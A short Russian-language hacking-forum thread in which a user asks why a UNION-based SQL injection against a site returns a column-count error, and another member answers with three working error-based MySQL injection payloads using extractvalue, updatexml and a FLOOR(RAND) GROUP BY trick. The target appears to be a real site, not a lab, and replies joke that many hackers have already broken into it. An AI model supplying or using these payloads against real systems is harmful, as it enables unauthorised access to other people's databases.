PDA

Просмотр полной версии : Вчем причина не совпадения столбцов при sql запросе


Glorph
16.10.2017, 00:41
Добрый вечер. пытаюсь провести sql инъекцию. с помощью GROUP

by выяснил что всего 12 столбцов. но когда ввожу union select 1,2,3...12 мне выдается "The used SELECT statements have a different number of columns"

karkajoi
16.10.2017, 13:29
Пробуй Error based

and extractvalue(1,concat(0x3a,(database())))-- -

and updatexml(NULL,concat(0x3a, ( select database())),Null)-- -

SELECT COUNT(*)FROM(SELECT1UNIONSELECT2UNIONSELECT3)xGROU PBYCONCAT(MID(database(),1,63),FLOOR(RAND(0)*2))-- -

erwerr2321
16.10.2017, 13:33
Он уже попробовал...

... а до него там это попробовали разного рода хакиры ещё 100500 тысяч раз!

karkajoi
16.10.2017, 14:06
Ну ошибка говорит , что не правильное количество столбцов подобрал.

erwerr2321
16.10.2017, 14:09
Я говорил об этом...


karkajoi said:
↑ (https://antichat.live/posts/4139005/)
Пробуй Error based


Он попробовал и потом всё получилось, и, как позже выяснилось, это получилось не только у него!

Glorph
16.10.2017, 17:18
всем спасибо за помощь буду разбираться в sql. людям которые написали в личку отдельное спасибо. если будут вопросы (а они будут) надеюсь не откажете в объяснение в личке. я понял что банальные мануалы по sql injection не подойдут. необходимо углубиться в сам язык. тему можно закрывать